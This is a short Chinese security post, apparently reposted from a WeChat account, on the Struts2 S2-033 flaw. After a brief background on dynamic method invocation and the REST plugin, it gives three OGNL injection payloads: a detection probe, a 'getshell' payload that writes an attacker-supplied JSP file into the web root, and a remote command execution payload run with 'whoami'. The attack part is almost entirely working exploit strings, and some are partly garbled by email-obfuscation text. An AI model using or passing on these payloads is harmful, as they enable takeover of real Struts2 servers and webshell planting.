s2-033三种POC+命令执行绕过

s2-033背景：

漏洞建立在032的基础上，还是对method没有进行过滤导致的，但是032的payload的要做转变才能检测

启用动态调用方法为true

支持rest插件

rest介绍：
使用http://localhost:8080/bee/action-name/1/XXX这种请求方式，其实XXX可以是任何合法的名字

Struts2会查找XXX为名字的方法来调用，比如请求http://localhost:8080/bee/test/1/abc，那么TestAction的public String abc()就会被调用

检测poc：

%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908

getshell POC：

%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),%23parameters.command[0].toString.json?&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=

内容
命令执行POC：

%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami

 

本文始发于微信公众号（飓风网络安全）：s2-033三种POC+命令执行绕过